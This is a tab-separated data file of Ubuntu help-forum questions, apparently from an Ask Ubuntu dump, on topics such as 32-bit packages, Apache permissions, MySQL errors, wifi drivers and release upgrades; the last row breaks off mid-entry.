depth 24 endsubsection endsection
363256	how do i make the binary package of adobe reader executable on my 64 bit ubntu , when the binary file is 32 bit ?	ive tried installing adobe reader using this commands in the terminal : sudo chmod +x adberdr9.3.2-1_i486linux_enu.bin sudo ./adberdr9.3.2-1_i486linux_enu.bin first line works fine , but the second line comes up with an error , saying unknown file or directory . know i later discovered that this is because i 'm downloading a 32-bit program on a 64-bit pc . so i tried installing 32 bit libraries using sudo apt-get install ia32-libsbut then i got the error e : package 'ia32-libs ' has no installation candidate . i then read somewhere that the aforementioned no longer works on ubuntu 13.04 , and i 've been clueless since , despite my research . how can i get this adobe pdf reader to become a full-on executable file ? and how can i download 32-bit libraries know ? i 'm new to ubuntu , so please provide me with what i should exactly type to get adobe pdf up and running .
363258	apache forbidden to acces `index` file on ntfs partition	after installing my apache , i edited the /etc/apache2/apache2.conf file , and added in the bottom-line , the following code : < virtualhost *:80 > documentroot /media/username/data/docs/pathtowebsite/website servername localhost < /virtualhost > the documentroot points to a external ntfs partition ! but after adding the lines , and restarting the apache2 service i get the following when ticking localhost in the firefox adres-bar : error forbidden you do n't have permission to access / on this server . apache/2.4.6 ( ubuntu ) server at localhost port 80 i tried fiddling with the fstab per this answer , but same error , after restart . i then installed ntfs-config , checked the enable write support for internal device box , but same error after restart ? and ntfs-config , also edits the fstab file , so am not sure what to remove and what to keep ? # entry for /dev/sda5 : uuid=3490454b-b5b0-4296-ae98-51ab08eecabc / ext4 errors=remount-ro 0 1 # entry for /dev/sda1 : uuid=506c44946c44772e /media/system ntfs-3g defaults , locale=nl_nl.utf-8 0 0 # entry for /dev/sda3 : uuid=01ccc676f2e07a60 /media/blade/data ntfs-3g defaults , nosuid , nodev , locale=nl_nl.utf-8 0 0 # entry for /dev/sda2 : uuid=9a3e8bf63e8bc9a9 /media/sda2 ntfs-3g defaults , locale=nl_nl.utf-8 0 0 /dev/sda6 none swap sw 0 0 # uuid=01ccc676f2e07a60 /mnt/data ntfs-3g defaults , nosuid , nodev , locale=nl_nl.utf-8 0 0 # uuid=01ccc676f2e07a60 /mnt/data ntfs-3g auto , users , permissions 0 0 i gksu nautilus to my external ntfs partition and tried to edit the permisions from my website folder , but , the group keeps jumping back to root . also does n't work via command-line . question : how can i edit my permissions on a ntfs drive , so that the www-data user can read my index file ? note : running ubuntu 13.10
363259	icon text labes - gnome panel ( 12.0.4 gnome-shell )	i have created a panel with web links , but without text labels its kinda difficult to operate on them since all icons are the same . any way to sort this out ?
363261	soft blocked bluetooth on ubuntu 12.04 lts ( lenovo g700 )	i ca n't enable bluetooth on my lenovo g700 . i 've tried few solutions without success . here is my rfkill list : adrian @ adrian-lenovo-g700 : ~ $ sudo rfkill list [ sudo ] password for adrian : 0 : ideapad_bluetooth : bluetooth soft blocked : yes hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no 2 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no can anyone help me with that ?
363262	install ubuntu in 32 bit window 7 professional	i am just a new comers i have download ubuntu-12.04.2-desktop-i386 iso file.i want to install it on window 7 32 bit can any one tell me detail process regarding to iti do n't want to loss my data . i want to install ubuntu in my e drive ( free ) ... ... .
363266	programs that blocked url 's	i want to know a list of program in ubuntu that blocked urls temporary . i have knowledge of aplomb but are there more program than that ?
363268	problem upgrading to 13.10	hi there i have this problem when iniciate ubuntu 13.10 ... i think some problem occurred while upgrading , really i do n't know , but when i try to restart ubuntu shows this : filesystem check or mount failed a maintenance shell will now be started control-d will terminate this shell and continue booting after re-trying file systems . any further errors will be ignored** i tried to restart from grub menu in recovery mode but does n't work . the option fsck or any other there shows : /lib/recovery-mode/recovery-menu : lă­nea 76 /etc/default/rcs : file or dir not exist
363270	permitrootlogin blocking non-root user	problem i 've setup a brand new virtual box server running ubuntu 10.04 . i 'm using putty to secure ssh into , this works fine except whenever i enable permitrootlogin no it blocks my non-root user . what 's wrong with my permissions ? set-up i created my new user using : usermod -a -g sudo user2 my original user ( root ) is user1 . here 's a printout of my user groups . root : x:0 : daemon : x:1 : bin : x:2 : sys : x:3 : adm : x:4 : user1 tty : x:5 : disk : x:6 : lp : x:7 : mail : x:8 : news : x:9 : uucp : x:10 : man : x:12 : proxy : x:13 : kmem : x:15 : dialout : x:20 : user1 fax : x:21 : voice : x:22 : cdrom : x:24 : user1 floppy : x:25 : tape : x:26 : sudo : x:27 : user2 audio : x:29 : dip : x:30 : www-data : x:33 : backup : x:34 : operator : x:37 : list : x:38 : irc : x:39 : src : x:40 : gnats : x:41 : shadow : x:42 : utmp : x:43 : video : x:44 : sasl : x:45 : plugdev : x:46 : user1 staff : x:50 : games : x:60 : users : x:100 : nogroup : x:65534 : libuuid : x:101 : crontab : x:102 : syslog : x:103 : fuse : x:104 : mysql : x:105 : mlocate : x:106 : ssh : x:107 : bind : x:108 : ssl-cert : x:109 : postfix : x:110 : postdrop : x:111 : dovecot : x:112 : netdev : x:113 : landscape : x:114 : user1 : x:1000 : lpadmin : x:115 : user1 sambashare : x:116 : user1 admin : x:117 : user1
363273	how to repair partition table for seagate goflex nas	i recently had an issue where i kept seeing `` no storage device attached '' when i was using my goflex home network attached storage device . i have since removed the device and attached it directly to my computer ( sata ) . however , ubuntu is not recognizing the partitions .
363276	can not start mysql server bind socket denied	i have been trying to start mysql server but got this error : ca n't start server : bind on unix socket : operation not permitted 2013-10-21 13:53:54 25098 [ error ] do you already have another mysqld server running on socket : [ my-home-dir ] /mysql-server/mysql.socket ? i have searched all pages on google on this topic and have tried all methods , but have no luck . so here are some more details . i do not have root access on the computer . what i do is install mysql server on my local directory . my my.cnf file looks like this : [ mysqld ] basedir = ~/mysql # # mysql unzipped files datadir = ~/mysql-server/data port = 3666 socket = ~/mysql-server/mysql.socket user = my-ubuntu-user-name my installation steps are : unzip the source code distribution of mysql 5.6 to ~/mysql create my.cnf as i showed above . initialize the server . this step does not show error . ./scripts/mysql_install_db -- defaults-file=my.cnf -- user=my-ubuntu-user -- datadir=~/mysql-server/data -- basedir=~/mysql -- socket=~/mysql-server/mysql.socket start the server ./bin/mysqld -- defaults-file=my.cnf and hence comes the error : ca n't start server : bind on unix socket : operation not permitted 2013-10-21 13:53:54 25098 [ error ] do you already have another mysqld server running on socket : [ my-home-dir ] /mysql-server/mysql.socket ? also , i have 755 access on all folders related . any suggestions would be helpful !
363277	issue with mouse clicks in windows manager	it 's a little hard to reproduce , but sometimes i seem to loose the ability to click on any windows . the active window has my keyboard focus , and clicking on any other window , or on the active window does not do anything . however , sometimes the active window and only the active window will accept mouse clicks , and other times unity will still accept mouse clicks but not any of the windows . sometimes i manage to close a few windows and it seems to come back . it feels like something owns the mouse , and wo n't letme change the active window . i 'm in 12.04 and on a custom built laptop . should i try an update to 12.10 or 13.04 ?
363279	why do i have kernel 3.8.0-32 in ubuntu 12.04 instead of 3.2.0-55 ?	with a freshly installed ubuntu 12.04 on my dell xps 13 , $ uname -r 3.8.0-32-generic on another laptop , $ uname -r 3.2.0-55-generic i would n't care if not for that low brightness bug https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/1163720 , that is only fixed with 3.2 ... and which makes the laptop pretty useless . the only hint of reason i can think of that could explain that kernel is that i had to execute boot-repair on my xps ( because uefi mess ... ) which asked me to execute some commands .. forgot which ones .. i know i added a ppa .. ot : i tried 13.10 on my xps , low brightness bug also , plus some indefinable display issue that i ca n't even google or ask for since it 's indefinable .
363280	unable to select chrome updates on ubuntu 12.04	i own two machines , both of which are running ubuntu 12.04 . i use google chrome on both . a google chrome update is available , and it appears in the update manager . however , i can not select the update . there is a check box beside the name of the update but i can not check it , no matter what i do . this error occurs on both machines . updates from the usual repositories ( e.g . canonical ) work fine . is anyone else experiencing this problem ? the repository i am using for chrome updates is dl.google.com/linux/chrome/deb/ thanks !
363281	can not add app shortcuts to desktop	iv just upgraded to ubuntu 13.10 , and ever since , i can not add any application shortcut onto the desktop . my desktop is blank right now , and it really sucks to have to open unity or launch the terminal whenever i want to access an application . how do i get around this problem , its really frustrating me .
363282	how to list installed packages with security patches ?	i would like to list all packages installed on a ubuntu server 10.04 that were upgraded for security reasons . is there any tool that will list all security packages installed on a system ? any help would be greatly appreciated . thanks , amit
363284	how to make linux to press a key everytime i write something	as the title says , i want linux to autopress a key everytime i write something . for example , whenever i type _i it should autopress ctrl+j ( if you 're wondering why , it 's for codeblocks : ) ) i already tried autokey but did n't figure out how to do this with it .. i saw now xdotool command that seems to do the right job , but it continuous keeps pressing ctrl+j , and i want only after i type _i . i made this code : # /bin/bash while true ; do xdotool key ctrl+j sleep 0.1 done now i think it should be something like # /bin/bash while true ; do if pressed '_i ' ; then xdotool key ctrl+j fi sleep 0.1 done but again , i do n't know how to do that if . can somebody give me any suggestions please ? thanks in advance !
363287	will it work on my rig ?	i have a cpu - intel core i3-2100 gpu - zotac geforce 9500gt ram - 4gb and windows 7 ultimate 64bit
363288	how can i read gsettings values from a filesystem backup ?	i have a complete filesystem backup from an old ubuntu installation . i 'd like to retrieve some data from it that was stored via gsettings , e.g . my old gnome terminal color selections or the commands from custom keyboard shortcuts . this answer says my data is stored in ~/.config/dconf/user , which is some kind of binary database . how can i read it ?
363289	is is possible to use two kernels at the same time ?	after upgrading from ubuntu 13.04 to ubuntu 13.10 intel vtune amplifier stopped working . as recommeded by developer i tried to reinstall the program and manually compile the needed drivers . however i got some compilation errors , so my next thought was to boot to previous kernel ( by restarting and choosing advanced options from grub menu ) and compile and run vtune under it . now when trying to compile i am facing this error : error : invalid or inaccessible kernel source directory `` /usr/src/linux-3.5.0-34-generic '' ! and when trying to get the header files , i am facing this : e : unable to locate package linux-headers-3.5.0-34-generic so is it at all possible to boot to the old kernel to run some programs and otherwise use the new kernel ? and if so , how could i solve my problem above ?
363291	multiple versions of python	i have just installed 13.10 and everything seemed to be working fine . as most of my development happens on top of python2.7 , that 's what i installed along with a bunch of other packages ... soon after , i noticed that the update-manager started crashing with the following message : fatal python error : py_initialize : unable to get the locale encoding file `` /usr/lib/python2.7/encodings/__init__.py '' , line 123 raise codecregistryerror , \ ^ syntaxerror : invalid syntax aborted ( core dumped ) i figured it must be something to do with python versions and it was . by executing the following before running the update-manager : export pythonpath=/usr/lib/python3/ it runs fine . my questions is how should i set the pythonpath so all the apps will live alongside happily ? i assume there must be a bunch of ubuntu apps that are python 3.x based ?
363292	mysql/c++ connector error	i have encountered the error for connecting mysql from c++ sqlexception : connection using old ( pre-4.1.1 ) authentication protocol refused ( client option 'secure_auth ' enabled ) i read some existing solutions for this problem and they seem to suggest restarting the server with updated setup . however , i am trying to connect to a remote server , and i do not have the root access to that server . here are some more details : the server version is 5.5.32 the client version is ver 14.14 distrib 5.1.69 , for redhat-linux-gnu ( x86_64 ) using readline 5.1 . it is strange since this is newer than 4.1.1 i also installed mysql/c++ connector 1.1 . i downloaded its source code and built it using cmake without error . so does anyone have any suggestions ? thanks !
363296	fglrx makes it impossible to login	i have a dell studio 1555 . it has a ati mobility radeon hd4570 , so i went to the ati website and downloaded the script to install the compatible fglrx module . every gets installed fine , no errors are shown , but when i power on the pc the login screen appears ( it was disabled , so i do n't know why it 's appearing ) and does n't let me log in . if i enter my login credentials , it shows a black screen and then the login screen again . what should i do to fix the problem ?
363297	windows 8 and ubuntu 12.04 lts dual-boot configuration	i am considering helping my friend install ubuntu 12.04.3 lts on her laptop . windows 8 is pre-installed ( i do not know which version ) and my plan is to install 12.04 lts in dual-boot configuration using advanced installation . i have a few concerns and inquiries as follows : how to partition the hdd and how to allocate space to each directory mount ? when i searched windows 8 ubuntu 12.04 lts in dual-boot configuration on this site i came across the concept uefi which i have no idea about . how can uefi affect the installation procedure ? should i choose 32-bit or 64-bit version of ubuntu ? would choosing a 64-bit version yield compatibility issues for drivers etc. ? the laptop has 4gb of ram . would choosing a newer edition of ubuntu be more efficient as an introduction to ubuntu ? many thanks for your contribution . feel free to ask for additional information if needed . p.s : i have downloaded the iso images for ubuntu today ( 21.10.2013 ) from 1 . i have read that uefi is some kind of successor to bios , yet i still do not know how this will affect grub2 . also i found info that 12.04.3 lts has support for uefi could you verify that ?
363300	how to install pip ( python ) to user without root access	right , fairly new here but here goes : i 'm trying to install pip ( python installer ) to my username since i do n't have root privileges and ca n't just sudo apt-get install python-pip . so what i 've done is just easy_install -- user pip . that installs it to .local/bin apparently but then when i call it like so : pip install -- user astropy it says that pip is not currently installed . i have limited knowledge of linux and of the system i 'm using ( nx connection to a machine at my university ) . i know i should be able to do this ! any ideas ? thanks
363301	skype freeze when trying to realize a call	i 've installed skype and it appears to work fine right up until the point where i try to call someone . if i try to video call someone then the program freezes and i have to force quit . i 've tried several 'solutions ' i 've found on various forums but none seem to work . now , when i try to call the echo service as a test to see if the bug 's fixed , it seems to connect and start the non-video call , except that it 's completely silent . no audio at all .
363302	nautilus does n't allow adding/removing bookmarks	i just did a fresh install of ubuntu 13.10 ( actually , i 've done two fresh installs , hoping that trying again would get this working ) . i do n't seem to have the ability to add or remove bookmarks from nautilus . the ones that are there by default ( home , desktop , documents , etc . ) work fine . i can right click on them and rename them . however , i can not remove any of them . the option is there `` remove '' but disabled/grayed out . the same is true if i try to add bookmarks . i go to `` files - > bookmarks '' , and all the bookmarks show up , but the buttons at the bottom to add , remove , or re-order the bookmarks are simply disabled . what am i doing wrong ?
363308	gamepads axes in ubuntu 13.04	i am trying to install gamepad ( nitho shock pad ) in ubuntu 13.04 . installed joystick , jstest-gtk . ( without them axes are not calibrated ) after this install axis 0 , axis 1 , axis 2 could not be calibrated ! this axes are main analog . how to fix it ? or there is another software to manage gamepads calibration ? thanks in advance .
363317	how to change the default drive to install programs on ubuntu 13.10	hello i have ubuntu and windows xp installed on my ssd . i want to use my other terabyte hdd for programs such as steam etc ... because i am out of space on my ssd .
363320	messed up installation of mysql-server - can not complete installation or deinstallation	apt-get got stuck while installing mysql-server . i do n't know why but it just stopped working and never continued . i had to reboot the machine in the middle of the setup process . now , if i try to install or purge the mysql-server package , apt-get tries to configure mysql-server first ( tells me its not installed before that ) and cancels with a error message : sub-process /usr/bin/dpkg returned an error code ( 1 ) apt-get also tells me that two packages have not been successfully installed or removed . this is the complete console output : christian @ devbox : ~ $ sudo apt-get install mysql-server [ sudo ] password for christian : reading package lists ... done building dependency tree reading state information ... done mysql-server is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 17 not upgraded . 2 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up mysql-server-5.5 ( 5.5.32-0ubuntu7 ) ... start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing mysql-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of mysql-server : mysql-server depends on mysql-server-5.5 ; however : package mysql-server-5.5 is not configured yet . dpkg : error processing mysql-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : mysql-server-5.5 mysql-server e : sub-process /usr/bin/dpkg returned an error code ( 1 ) christian @ devbox : ~ $
363321	how to do an offline upgrade from quantal ( 12.04 ) to saucy ( 13.10 )	back when 12.10 was released , the alternative cds were dropped . without those it seems that is is not possible to upgrade from one version of kubuntu to a newer version unless you have a direct internet connection . i have patchy and expensive internet , and would very much like to be able to download a whole chunk of stuff , copy it over to my kubuntu box , and do an `` offline '' distribution upgrade . can anyone tell me if this is possible ? can apt-offline be used to do distribution upgrades ? can keryx be used to do this somehow ? oh , another complication : the machine i have that has occasional but great internet connection is a windows box , so it 'd be great if there is a way to download a whole chunk of stuff using this windows box . i realise that i 'll probably have to do several distribution upgrades ( i.e . from 12.04 to 12.10 , then 12.10 to 13.04 , then 13.04 to 13.10 ) , i 'm ok with that .
363322	ubuntu 13.10 problems in apt-get update	i recently install ubuntu 13.10 , but i had several difficulties on installing several programs from 'ubuntu software center ' . i tried to update the repositories but i get the follow result ( the * are mine since i cant put more than 2 links ) : ign http* : //security.ubuntu.com saucy-security inrelease ign http* : //extras.ubuntu.com saucy inrelease hit http* : //security.ubuntu.com saucy-security release.gpg hit http* : //extras.ubuntu.com saucy release.gpg hit http* : //security.ubuntu.com saucy-security release hit http* : //extras.ubuntu.com saucy release hit http* : //security.ubuntu.com saucy-security/main sources hit http* : //extras.ubuntu.com saucy/main sources hit http* : //security.ubuntu.com saucy-security/restricted sources hit http* : //extras.ubuntu.com saucy/main amd64 packages hit http* : //security.ubuntu.com saucy-security/universe sources hit http* : //extras.ubuntu.com saucy/main i386 packages hit http* : //security.ubuntu.com saucy-security/multiverse sources hit http* : //security.ubuntu.com saucy-security/main amd64 packages hit http* : //security.ubuntu.com saucy-security/restricted amd64 packages hit http* : //security.ubuntu.com saucy-security/universe amd64 packages hit http* : //security.ubuntu.com saucy-security/multiverse amd64 packages hit http* : //security.ubuntu.com saucy-security/main i386 packages hit http* : //security.ubuntu.com saucy-security/restricted i386 packages hit http* : //security.ubuntu.com saucy-security/universe i386 packages hit http* : //security.ubuntu.com saucy-security/multiverse i386 packages ign http* : //extras.ubuntu.com saucy/main translation-en_us ign http* : //extras.ubuntu.com saucy/main translation-en hit http* : //security.ubuntu.com saucy-security/main translation-en hit http* : //security.ubuntu.com saucy-security/multiverse translation-en hit http* : //security.ubuntu.com saucy-security/restricted translation-en hit http* : //security.ubuntu.com saucy-security/universe translation-en ign http* : //security.ubuntu.com saucy-security/main translation-en_us ign http* : //security.ubuntu.com saucy-security/multiverse translation-en_us ign http* : //security.ubuntu.com saucy-security/restricted translation-en_us ign http* : //security.ubuntu.com saucy-security/universe translation-en_us err http* : //us.archive.ubuntu.com saucy inrelease err http* : //us.archive.ubuntu.com saucy-updates inrelease err http* : //us.archive.ubuntu.com saucy-backports inrelease err http* : //us.archive.ubuntu.com saucy release.gpg can not initiate the connection to us.archive.ubuntu.com:80 ( 2001:67c:1562 : :14 ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1562 : :14 80 ] err http* : //us.archive.ubuntu.com saucy-updates release.gpg can not initiate the connection to us.archive.ubuntu.com:80 ( 2001:67c:1562 : :14 ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1562 : :14 80 ] err http* : //us.archive.ubuntu.com saucy-backports release.gpg can not initiate the connection to us.archive.ubuntu.com:80 ( 2001:67c:1562 : :14 ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1562 : :14 80 ] reading package lists ... done w : failed to fetch http* : //us.archive.ubuntu.com/ubuntu/dists/saucy/inrelease w : failed to fetch http* : //us.archive.ubuntu.com/ubuntu/dists/saucy-updates/inrelease w : failed to fetch http* : //us.archive.ubuntu.com/ubuntu/dists/saucy-backports/inrelease w : failed to fetch http* : //us.archive.ubuntu.com/ubuntu/dists/saucy/release.gpg can not initiate the connection to us.archive.ubuntu.com:80 ( 2001:67c:1562 : :14 ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1562 : :14 80 ] w : failed to fetch http* : //us.archive.ubuntu.com/ubuntu/dists/saucy-updates/release.gpg can not initiate the connection to us.archive.ubuntu.com:80 ( 2001:67c:1562 : :14 ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1562 : :14 80 ] w : failed to fetch http* : //us.archive.ubuntu.com/ubuntu/dists/saucy-backports/release.gpg can not initiate the connection to us.archive.ubuntu.com:80 ( 2001:67c:1562 : :14 ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1562 : :14 80 ] w : some index files failed to download . they have been ignored , or old ones used instead . i want to install seaview , dropbox , terminator and the idle of python 2.7 , but i ca n't since i get 'there isn’t a software package called “” in your current software sources ' or 'available from the `` multiverse '' source . however , for this last one , when i do click over `` use this source '' nothing happens . i need help . tx to all .
363324	upgrading to ubuntu 13.10	i 'm trying to upgrade from ubuntu 13.04 to 13.10 . but i have xorg-edgers drivers installed , so i get error when i upgrade . same errors as here so i tried the command : grep broken /var/log/dist-upgrade/apt.log and got a list of packages as here how do i remove those packages ?
363326	problem connecting to wifi ( without network-manager )	hi the question is simple . how can i use one wifi adapter to recieve info and also host it . ( aka a wifi hotspot while using wifi ) the masquarade algorithm allows for this in my case . and other algorithms do too in other cases . people think its not possible with their respective drivers . but it is mostly . right now im using ubuntu12.04.3 but i have tried to solve this issue on fedora core , gentoo , linux mint , debian , and ubuntu12.04.3desktop . i dont see how my distro is relavant since its really just manipulation done via iptables . but maybe certain distros have services that can kill/break this . for example when i use fedora i need to kill nn-applet or network manager plasma and on ubuntu network-manager . please tell me which linux distros are supported if mine is not . i have browsed the web for a long time on this.. sadly my life has been dominated by windows . and i can fully write myself a program to do this in visual basics but dont know anything about linux . also i have tried various methods online all which create two seperate interfaces one which listens another which shares . all the methods online are basically the same and use tools like iw , udhcpc , hostapd ... for reference throught the rest of this post ill be talking about this method which others also have problems with : http : //linuxalfi.wordpress.com/2011/11/08/connectify-for-linux-with-single-wireless-interface/ i have an eeepc1005hab running ubuntu12.04.3 desktop my first step is to connect to internet without network-manager . sudo service network-manager stop yes i know this is harder , but i will need to do it later anyway . so i tried configuring /etc/wpa_supplicant.conf with ctrl_interface=/var/run/wpa_supplicant network= { ssid=annequ key_mgmt=wpa-psk proto=rsn ( i also tried wpa and wpa2 ) pairwise=ccmp ( i also tried tkip aes and combinations ) group=ccmp ( also tried the above ) psk=annequlol } ( i tried with `` s and without lol ) ok so i try it out ... fail ... in my bash script ( which you can see in the link ) i get many errors ... sometimes it says something about entropy ( i tried using /dev/urandom ) but since the problem is n't actually about entropy it still fails . other times it repeats the forever that my interface is associating with the router ( the mac address its associating with is correct ) but then it says failed . so i get mad and download the gui . ( wpa_gui ) i set it up and click connect and it says ( adapter host ) : status : completed ( station ) . ( good right ? ) authentication : wpa2-psk encryption : ccmp ssid : annequ bbsid : 28:2c : b2:08:68 ip address : ( nothing ) ok so clearly i 'm a noob.. ( is my problem with udhcpd.conf instead ? ) . its only my third day on linux so idk what exactly is stopping me from getting connection : ( i tried ifconfig host 192.168.1.155 up and now it gives me an ip in wpa_gui but not connection . ifconfig -a they are up and running and the wlan0/eth0 is down . my other virual interface can accept clients and evrything ! but the problem is when my phone asks for an ipaddress none is given . and its disconnected , and reconnects again with another `` handshake accepted '' as you can see trying to connect the host interface to the internet is my problem . if so eone can help me connect this interface , or link me somewhere i can read please do ! i have a hacked rom as my firmware on my android phone for obv reasons and i use my laptop to connect to a vpn and do some tunneling . as you can see doing all that on the laptop makes it a lot easier . ( although i also have it all on the phone ) ( but if you know about google android you know about why vpning on pc is better ) '' my script '' for doing this all automatically is in the link and is actually that guys . and i thank him so much . i will mention ăžve tried my own little scripts . actually ive even tried like 5 .sh files i found online also ... i went through each line by line ofc ... and they all seemed ok ... in the mentioned script i believe one line has an error , so i tried changing this line . $ sudo ifconfig ap1 ether hw 12:34 : a3:4f:5g:4e to $ sudo ifconfig ap1 hw ether 12:34 : a3:4f:5g:4e and now it works but also apparantly i can not change my mac completely . ( i can with other tools ) , but what i did was just change the last digit which was allowed and now interface host gets assigned a seperate address ) so if you know why its not working for me please help : ( either way i thank the linux community for the freedom they give me and am in utter shock i have never used linux before . it feels so good . it looks so amazing ! its so powerful although setting this up on windows was really easy : ( but that 's just because im a nooby to linux . also if it helps i will post all my .conf files and i will post my terminal and system logs . also i can post any other info people need . maybe i need to reninstall the nl80211 driver . the output on my terminal is missing one obvious thing when i run the script btw . host is not associating with the real router propperly , and hence no internet , and hence ap1 is worthlessly accepting clients . busybox starts mini dhcp server . and the interfaces are up and broadcasting . and ap1 is functional .
363327	ubuntu 13.10 secondary monitor - does n't redraw properly	hi i 've just installed ubuntu 13.10 on a lenovo w350 and am having some issues with graphics driver . standard nouveau drivers work great on the laptop display but when i attach an external display it goes bad on the external monitor , seems it 's not re-drawing properly . ( photo attached ) . i 've tried other drivers but none of them detect the external monitor when connected . any ideas ? 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gk107glm [ quadro k1000m ] ( rev a1 ) screenshot of effected monitor -- update 1 : i have noticed that if i leave the system monitor open the display improves . wierd . update 2 : if i leave a video going the lag/flicker issues stop .
363330	how to install with wubi without internet connection	if i place wubi.exe and iso of same version in a single folder then is it possible to install ubuntu . my problem is that i have no broad band connection can i install ubuntu with windows installer ?
363331	wifi problems with ubuntu 13.10	i should probably say straight off that i am brand new to ubuntu . i installed 13.10 alongside windows 7 a couple of days ago and i 've managed to clear up all the little problems , apart from with the wifi . my internet is fine using an ethernet cable . i can connect to the wifi , and it tells me that the signal is good , but for the vast majority of the time i ca n't load anything , and system monitor tells me that i am sending and receiving nothing . the problem is somewhere in ubuntu . it works fine on windows 7 , my android phone and all of my flatmates laptops . i know i 'm not the only one with this problem , but the fixes i 've seen either do n't work or i do n't understand them enough to carry them out . help ? edit : sudo killall networkmanager works sometimes , thanks for the tip , but i have to keep doing it every few minutes , which is really not practical . edit : from lspci command as requested 00:00.0 host bridge : intel corporation mobile 4 series chipset memory controller hub ( rev 07 ) 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 00:02.1 display controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 00:1a.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 4 ( rev 03 ) 00:1a.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 5 ( rev 03 ) 00:1a.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 ( rev 03 ) 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 03 ) 00:1c.0 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 1 ( rev 03 ) 00:1c.1 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 2 ( rev 03 ) 00:1d.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 1 ( rev 03 ) 00:1d.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 2 ( rev 03 ) 00:1d.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 ( rev 03 ) 00:1d.3 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 6 ( rev 03 ) 00:1d.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 ( rev 03 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev 93 ) 00:1f.0 isa bridge : intel corporation ich9m lpc interface controller ( rev 03 ) 00:1f.2 sata controller : intel corporation 82801ibm/iem ( ich9m/ich9m-e ) 4 port sata controller [ ahci mode ] ( rev 03 ) 00:1f.3 smbus : intel corporation 82801i ( ich9 family ) smbus controller ( rev 03 ) 00:1f.6 signal processing controller : intel corporation 82801i ( ich9 family ) thermal subsystem ( rev 03 ) 02:00.0 network controller : realtek semiconductor co. , ltd. rtl8191seva wireless lan controller ( rev 10 ) 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 02 )
363332	vpn/proxy/ip changer	guys ! i apologize in advance if this question comes up often here . i 'm a very beginner using ubuntu and i 'd appreciate any help to keep using it . i usually work with a mac and a windows computer , but now i 've decided to install ubuntu on my windows laptop . it 's been great so far ( i 've installed 12.04 precise pangolin ) . however i travel a lot and often i use some websites and softwares which do not work in the other countries where i 've been travelling . while using windows i used flyvpn and tunnelbear to fake an ip adress in usa or uk ( where i currently live ) . so , could you guys tell me how can i make the same ? i 've been searching on google for days and i still did n't find a solution.. maybe my lack of knowledge when it comes to ubuntu.. i appreciate any help ! thanks !
363336	13.10 upgrade dropping wifi	almost a complete newb here . after my last upgrade from 12.04 to 13.10 my wifi now randomly drops . the only way i can get a signal back is a shutdown and restart otherwise it shows no network is even available to connect to . had no problems until the upgrade . any help would be appreciated . h/w path device class description ==================================================== system h8-1534 ( h2n64aa # aba ) /0 bus 2ac8 /0/0 memory 64kib bios /0/4 processor amd fx ( tm ) -6200 six-core processor /0/4/5 memory 288kib l1 cache /0/4/6 memory 6mib l2 cache /0/4/7 memory 8mib l3 cache /0/d memory 10gib system memory /0/d/0 memory dimm synchronous [ empty ] /0/d/1 memory 4gib dimm ddr3 synchronous 1600 mhz ( 0.6 ns ) /0/d/2 memory 2gib dimm ddr3 synchronous 1600 mhz ( 0.6 ns ) /0/d/3 memory 4gib dimm ddr3 synchronous 1600 mhz ( 0.6 ns ) /0/100 bridge rd890 pci to pci bridge ( external gfx0 port b ) /0/100/0.2 generic rd990 i/o memory management unit ( iommu ) /0/100/2 bridge rd890 pci to pci bridge ( pci express gpp port b ) /0/100/2/0 display turks pro [ radeon hd 7570 ] /0/100/2/0.1 multimedia turks/whistler hdmi audio [ radeon hd 6000 series ] /0/100/5 bridge rd890 pci to pci bridge ( pci express gpp port e ) /0/100/5/0 bus tusb73x0 superspeed usb 3.0 xhci host controller /0/100/11 storage sb7x0/sb8x0/sb9x0 sata controller [ raid5 mode ] /0/100/12 bus sb7x0/sb8x0/sb9x0 usb ohci0 controller /0/100/12.2 bus sb7x0/sb8x0/sb9x0 usb ehci controller /0/100/13 bus sb7x0/sb8x0/sb9x0 usb ohci0 controller /0/100/13.2 bus sb7x0/sb8x0/sb9x0 usb ehci controller /0/100/14 bus sbx00 smbus controller /0/100/14.2 multimedia sbx00 azalia ( intel hda ) /0/100/14.3 bridge sb7x0/sb8x0/sb9x0 lpc host controller /0/100/14.4 bridge sbx00 pci to pci bridge /0/100/14.5 bus sb7x0/sb8x0/sb9x0 usb ohci2 controller /0/100/15 bridge sb700/sb800/sb900 pci to pci bridge ( pcie port 0 ) /0/100/15.1 bridge sb700/sb800/sb900 pci to pci bridge ( pcie port 1 ) /0/100/15.2 bridge sb900 pci to pci bridge ( pcie port 2 ) /0/100/15.2/0 wlan0 network rt3290 wireless 802.11n 